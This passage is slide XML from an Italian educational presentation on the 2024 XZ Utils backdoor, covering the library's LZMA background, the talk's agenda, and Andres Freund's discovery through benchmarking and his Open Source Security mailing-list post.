          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="138548" y="1984887"/>
            <a:ext cx="11866844" cy="42165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800" b="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>XZ </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="2800" b="1" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Utils</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="2800" b="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="2800" b="1" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>overview</a:t>
            </a:r>
            <a:endParaRPr lang="it-IT" err="1">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:endParaRPr lang="it-IT" sz="2400">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="it-IT" sz="2400">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="+mn-lt"/>
              </a:rPr>
              <a:t>Il progetto iniziale si basa sull'algoritmo LZMA (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="2400" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="+mn-lt"/>
              </a:rPr>
              <a:t>Lempel-Ziv</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="2400">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="+mn-lt"/>
              </a:rPr>
              <a:t> Markov-chain </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="2400" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="+mn-lt"/>
              </a:rPr>
              <a:t>Algorithm</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="2400">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="+mn-lt"/>
              </a:rPr>
              <a:t>), sviluppato dal </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="2400" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="+mn-lt"/>
              </a:rPr>
              <a:t>maintainer</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="2400">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="+mn-lt"/>
              </a:rPr>
              <a:t> di 7-Zip Igor Pavlov.</a:t>
            </a:r>
            <a:endParaRPr lang="it-IT">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:endParaRPr lang="it-IT" sz="2400">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
              <a:latin typeface="Trade Gothic Next Light"/>
              <a:cs typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="it-IT" sz="2400">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Trade Gothic Next Light"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>Attualmente XZ </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="2400" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Trade Gothic Next Light"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>Utils</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="2400">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Trade Gothic Next Light"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t> usa primariamente l'algoritmo di filtro LZMA2. È progettato per creare file circa il 30% più piccoli di </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="2400" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Trade Gothic Next Light"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>gzip</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="2400">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Trade Gothic Next Light"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t> e ha un'API simile a </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="2400" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Trade Gothic Next Light"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>zlib</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="2400">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Trade Gothic Next Light"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t> per facilitare l'integrazione nei sistemi esistenti. LZMA2 è ottimizzato per un'elevata compressione a scapito di CPU e RAM, ma è più veloce da decomprimere rispetto a bzip2. Supporta il concatenamento dei filtri per una migliore compressione e la compressione </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="2400" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Trade Gothic Next Light"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>multithread</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="2400">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Trade Gothic Next Light"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>, con piani futuri per la decompressione </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="2400" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Trade Gothic Next Light"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>multithread</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="2400">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Trade Gothic Next Light"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>.</a:t>
            </a:r>
            <a:endParaRPr lang="it-IT" sz="2400">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
              <a:latin typeface="Trade Gothic Next Light"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="42043411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F2AFF39-6F5A-1E50-7CDE-8AAD21C2B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166" y="3300"/>
            <a:ext cx="10524739" cy="1452552"/>
          </a:xfrm>
          <a:solidFill>
            <a:schemeClr val="bg2"/>
          </a:solidFill>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="it-IT" sz="4000"/>
              <a:t>  sommario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A698C9B-A4EA-4166-BB4E-5F2D0E1F8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AFF03-0A74-4B45-B900-A104A13AD368}" type="datetime1">
              <a:rPr lang="it-IT"/>
              <a:t>07/06/2024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B864F53-019D-926A-DB74-BA373E3FA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83DB1B8-299C-899A-BCC9-0785B184C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14</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="37" name="Segnaposto contenuto 36" descr="Immagine che contiene schizzo, diagramma, pixel&#10;&#10;Descrizione generata automaticamente">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{6400CFC6-8C27-B738-B0F7-BEBC02B5C7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433" y="7285"/>
            <a:ext cx="1676961" cy="1453403"/>
          </a:xfrm>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="39" name="CasellaDiTesto 38">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{42A27160-7963-656C-9FB1-68F8080C23CA}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="198904" y="1792941"/>
            <a:ext cx="8634131" cy="48320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514350" indent="-514350">
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="it-IT" sz="2800">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Trade Gothic Next Light"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>Introduzione</a:t>
            </a:r>
            <a:endParaRPr lang="it-IT">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
              <a:latin typeface="Trade Gothic Next Light"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="514350" indent="-514350">
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:endParaRPr lang="it-IT" sz="2800">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
              <a:latin typeface="Trade Gothic Next Light"/>
              <a:cs typeface="Calibri"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="514350" indent="-514350">
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="it-IT" sz="2800" b="1" u="sng">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Trade Gothic Next Light"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>La scoperta di Andres Freund</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="514350" indent="-514350">
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:endParaRPr lang="it-IT" sz="2800">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
              <a:latin typeface="Trade Gothic Next Light"/>
              <a:cs typeface="Calibri"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="514350" indent="-514350">
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="it-IT" sz="2800">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Trade Gothic Next Light"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>La strategia di </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="2800" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Trade Gothic Next Light"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>Jia</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="2800">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Trade Gothic Next Light"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t> Tan</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="514350" indent="-514350">
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:endParaRPr lang="it-IT" sz="2800">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
              <a:latin typeface="Trade Gothic Next Light"/>
              <a:cs typeface="Calibri"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="514350" indent="-514350">
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="it-IT" sz="2800">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Trade Gothic Next Light"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>Struttura della backdoor</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="514350" indent="-514350">
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:endParaRPr lang="it-IT" sz="2800">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
              <a:latin typeface="Trade Gothic Next Light"/>
              <a:cs typeface="Calibri"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="514350" indent="-514350">
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="it-IT" sz="2800">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Trade Gothic Next Light"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>Forme di mitigazione</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="514350" indent="-514350">
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:endParaRPr lang="it-IT" sz="2800">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
              <a:latin typeface="Trade Gothic Next Light"/>
              <a:cs typeface="Calibri"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="514350" indent="-514350">
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="it-IT" sz="2800">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Trade Gothic Next Light"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>Cosa sappiamo oggi</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="10812129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F2AFF39-6F5A-1E50-7CDE-8AAD21C2B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167" y="3300"/>
            <a:ext cx="10524738" cy="1452552"/>
          </a:xfrm>
          <a:solidFill>
            <a:schemeClr val="bg2"/>
          </a:solidFill>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="it-IT" sz="4000"/>
              <a:t> La scoperta di </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="4000" err="1"/>
              <a:t>andres</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="4000"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="4000" err="1"/>
              <a:t>freund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A698C9B-A4EA-4166-BB4E-5F2D0E1F8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AFF03-0A74-4B45-B900-A104A13AD368}" type="datetime1">
              <a:rPr lang="it-IT"/>
              <a:t>07/06/2024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B864F53-019D-926A-DB74-BA373E3FA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83DB1B8-299C-899A-BCC9-0785B184C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15</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="37" name="Segnaposto contenuto 36" descr="Immagine che contiene schizzo, diagramma, pixel&#10;&#10;Descrizione generata automaticamente">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{6400CFC6-8C27-B738-B0F7-BEBC02B5C7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433" y="7285"/>
            <a:ext cx="1676961" cy="1453403"/>
          </a:xfr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C584BB4A-FACA-4161-5F39-9ECB562902C0}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="138548" y="1938705"/>
            <a:ext cx="11866844" cy="35394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800" b="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Trade Gothic Next Light"/>
              </a:rPr>
              <a:t>Chi è Andres Freund</a:t>
            </a:r>
            <a:endParaRPr lang="it-IT">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:endParaRPr lang="it-IT" sz="2800" b="1">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
              <a:latin typeface="Trade Gothic Next Light"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="it-IT" sz="2400">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Trade Gothic Next Light"/>
              </a:rPr>
              <a:t>Andres Freund è un ingegnere del software presso Microsoft, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="2400">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="+mn-lt"/>
              </a:rPr>
              <a:t>San Francisco. </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="it-IT" sz="2400">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="+mn-lt"/>
              </a:rPr>
              <a:t>Più nello specifico, è uno sviluppatore </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="2400" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="+mn-lt"/>
              </a:rPr>
              <a:t>Postgre</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="2400">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Trade Gothic Next Light"/>
              </a:rPr>
              <a:t>.</a:t>
            </a:r>
            <a:endParaRPr lang="it-IT">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="it-IT" sz="2400" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Trade Gothic Next Light"/>
              </a:rPr>
              <a:t>Benchè</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="2400">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Trade Gothic Next Light"/>
              </a:rPr>
              <a:t> non sia una figura esperta di sicurezza informatica, è stato il primo ad intuire una falla nella sicurezza dei sistemi Unix-like.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="it-IT" sz="2400">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Trade Gothic Next Light"/>
              </a:rPr>
              <a:t>Il 29 Marzo 2024, una sessione di benchmarking di routine su </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="2400" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Trade Gothic Next Light"/>
              </a:rPr>
              <a:t>Postgre</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="2400">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Trade Gothic Next Light"/>
              </a:rPr>
              <a:t> finisce per diventare una indagine approfondita che lo porterà a scrivere un articolo su </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="2400" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Trade Gothic Next Light"/>
              </a:rPr>
              <a:t>OpenWall</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="2400">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Trade Gothic Next Light"/>
              </a:rPr>
              <a:t>, nella Open Source Security mailing list, per lanciare un allarme.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="350883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F2AFF39-6F5A-1E50-7CDE-8AAD21C2B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167" y="3300"/>
            <a:ext cx="10524738" cy="1452552"/>
          </a:xfrm>
          <a:solidFill>
            <a:schemeClr val="bg2"/>
          </a:solidFill>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="it-IT" sz="4000"/>
              <a:t> La scoperta di </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="4000" err="1"/>
              <a:t>andres</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="4000"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="4000" err="1"/>
              <a:t>freund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A698C9B-A4EA-4166-BB4E-5F2D0E1F8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AFF03-0A74-4B45-B900-A104A13AD368}" type="datetime1">
              <a:rPr lang="it-IT"/>
              <a:t>07/06/2024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B864F53-019D-926A-DB74-BA373E3FA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83DB1B8-299C-899A-BCC9-0785B184C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16</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="37" name="Segnaposto contenuto 36" descr="Immagine che contiene schizzo, diagramma, pixel&#10;&#10;Descrizione generata automaticamente">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{6400CFC6-8C27-B738-B0F7-BEBC02B5C7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433" y="7285"/>
            <a:ext cx="1676961" cy="1453403"/>
          </a:xfr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C584BB4A-FACA-4161-5F39-9ECB562902C0}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="138548" y="1938705"/>
            <a:ext cx="11866844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800" b="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Trade Gothic Next Light"/>
              </a:rPr>
              <a:t>Post su Mastodon</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="3" name="Immagine 2" descr="Immagine che contiene testo, schermata&#10;&#10;Descrizione generata automaticamente">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{DD4AF1D8-72F5-9833-6DCB-D77871014A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2955" y="2923458"/>
            <a:ext cx="5219050" cy="3444162"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="7" name="Immagine 6" descr="Immagine che contiene testo, schermata, Carattere&#10;&#10;Descrizione generata automaticamente">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{47D12961-5563-E61C-10F1-968D49FAF5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239" y="2924957"/>
            <a:ext cx="5462005" cy="3287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3597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F2AFF39-6F5A-1E50-7CDE-8AAD21C2B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167" y="3300"/>
            <a:ext cx="10524738" cy="1452552"/>
          </a:xfrm>
          <a:solidFill>
            <a:schemeClr val="bg2"/>
          </a:solidFill>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="it-IT" sz="4000"/>
              <a:t> La scoperta di </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="4000" err="1"/>
              <a:t>andres</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="4000"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="4000" err="1"/>
              <a:t>freund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A698C9B-A4EA-4166-BB4E-5F2D0E1F8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AFF03-0A74-4B45-B900-A104A13AD368}" type="datetime1">
              <a:rPr lang="it-IT"/>
              <a:t>07/06/2024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B864F53-019D-926A-DB74-BA373E3FA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83DB1B8-299C-899A-BCC9-0785B184C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17</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="37" name="Segnaposto contenuto 36" descr="Immagine che contiene schizzo, diagramma, pixel&#10;&#10;Descrizione generata automaticamente">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{6400CFC6-8C27-B738-B0F7-BEBC02B5C7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433" y="7285"/>
            <a:ext cx="1676961" cy="1453403"/>
          </a:xfr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C584BB4A-FACA-4161-5F39-9ECB562902C0}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="138548" y="1938705"/>
            <a:ext cx="11866844" cy="501675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800" b="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Trade Gothic Next Light"/>
              </a:rPr>
              <a:t>Pubblicazione su OSS</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="it-IT" sz="2800" b="1">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
              <a:latin typeface="Trade Gothic Next Light"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="it-IT" sz="2400">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Trade Gothic Next Light"/>
              </a:rPr>
              <a:t>Sulla mailing list Open Source Security, Andres Freund spiega di aver scoperto la backdoor a seguito di una sessione di benchmarking su una versione di </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="2400" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Trade Gothic Next Light"/>
              </a:rPr>
              <a:t>Debian</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="2400">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Trade Gothic Next Light"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="2400" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Trade Gothic Next Light"/>
              </a:rPr>
              <a:t>Unstable</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="2400">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Trade Gothic Next Light"/>
              </a:rPr>
              <a:t>.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="it-IT" sz="2400">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Trade Gothic Next Light"/>
              </a:rPr>
              <a:t>Analizzando la patch con </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="2400" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Trade Gothic Next Light"/>
              </a:rPr>
              <a:t>Valgrind</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="2400">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Trade Gothic Next Light"/>
              </a:rPr>
              <a:t>, nota che:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="342900" indent="-342900">
              <a:buFont typeface="Arial"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="it-IT" sz="2400">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Trade Gothic Next Light"/>
              </a:rPr>
              <a:t>SSH impiega "parecchia" CPU;</a:t>
            </a:r>
          </a:p>
